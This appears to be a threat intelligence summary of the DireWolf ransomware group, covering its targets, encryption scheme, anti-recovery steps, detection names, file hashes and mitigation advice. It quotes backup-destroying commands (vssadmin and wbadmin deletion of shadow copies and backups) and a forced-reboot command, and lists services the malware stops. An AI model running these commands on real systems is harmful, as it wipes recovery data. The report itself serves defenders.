Threat Overview

We have identified a new threat report published by CyberHunter_NL on September 3, 2025. The report details the activities of the DireWolf ransomware group, which has been targeting businesses across Asia and Australia since May 2025. This group employs a double extortion technique, encrypting data and threatening to leak it unless a ransom is paid.

Dire Wolf Ransomware Group

The DireWolf ransomware group emerged in May 2025 and disclosed their first six victims on a darknet leak site on May 26 of the same year. Their primary goal is financial gain, and they contact victims through the Tox messenger. The group targets various industries, including manufacturing, IT, construction, and finance, across multiple regions such as Asia, Australia, Italy, and others.

Analysis Details

The DireWolf ransomware operates based on command-line arguments without relying on a configuration file. Key arguments include -d for specifying a target directory and -h for printing execution help. Upon processing these arguments, the malware performs an initial protection check using a system-wide mutex to ensure it is not already running.

If conditions are met, DireWolf launches its pre-processing routine and configures a worker pool after a 2-second delay. The size of this pool is managed as a global variable, with goroutines equivalent to eight times the number of logical CPUs being injected concurrently. This design aims to maximize throughput but can significantly increase CPU usage and disk queue, leading to performance degradation.

The ransomware employs various anti-recovery techniques, including self-deletion, deletion of event logs, and removal of backup-related data. It forcibly terminates critical processes such as databases (MSSQL, Oracle), mail servers (Exchange), virtualization platforms (VMware), backup software (Veeam, Veritas BackupExec), and security solutions (Symantec, Sophos). This disruption aims to prevent recovery and normal operation.

DireWolf also targets specific services for termination, rendering recovery and security features ineffective. These include BackupExecJobEngine, SQLSERVERAGENT, wuauserv, VeeamTransportSvc, and MSExchangeIS. The malware deletes system restore points (shadow copies) using commands like vssadmin delete shadows /all /quiet and wbadmin delete backup -keepVersions:0 -quiet.

During the encryption phase, DireWolf creates a random-based private key for each file, performing a Curve25519 key exchange with its hard-coded public key. The shared secret is processed through SHA-256 to derive the encryption key and nonce value. The ChaCha20 stream cipher algorithm is then used for encryption, which is known for its speed and efficiency in handling large data sets.

Small files under 1 MB are fully encrypted, while larger files have only their first 1 MB segment encrypted. This approach balances protection with processing speed, allowing the threat actor to encrypt as many files as possible quickly.

Post-Encryption Activities

After encryption, DireWolf creates a marker file to record the completion status and schedules a forced reboot using the shutdown -r -f -t 10 command. This minimizes the time available for users to respond. Regardless of the reboot outcome, the malware executes its self-deletion routine, making it challenging for security analysts to collect samples.

Conclusion

Despite being a new group, DireWolf poses a significant threat to organizations with vulnerable systems across various industries. Their technical approach combines Curve25519-based key exchange with ChaCha20 stream encryption, effectively blocking known decryption methods. Additionally, they employ anti-recovery and anti-analysis techniques, proactively terminating backup processes and deleting event logs.

AhnLab’s Response

Detection names and engine dates of AhnLab products for DireWolf ransomware include:

• V3: Malware/Win.Generic.C5380825, Ransom/MDP.Delete.M2117, Ransom/MDP.Command.M1751, Ransom/MDP.Behavior.M2813, Ransom/MDP.Decoy.M1171, Ransom/MDP.Event.M1946
• EDR: SystemManipulation/EDR.Event.M2486, SystemManipulation/EDR.Event.M1751, Ransom/EDR.Decoy.M2470, Ransom/MDP.Event.M1946

The MD5 hashes associated with this threat are: 333fd9dd9d84b58c4eef84a8d07670dd, 44da29144b151062bce633e9ce62de85, aa62b3905be9b49551a07bc16eaad2ff, bc6912c853be5907438b4978f6c49e43.

Recommendations

To mitigate the risks posed by DireWolf ransomware:

• Implement robust backup and recovery solutions.
• Regularly update and patch systems to protect against known vulnerabilities.
• Use advanced threat detection and response tools.
• Educate employees on recognizing and avoiding phishing attempts and other social engineering attacks.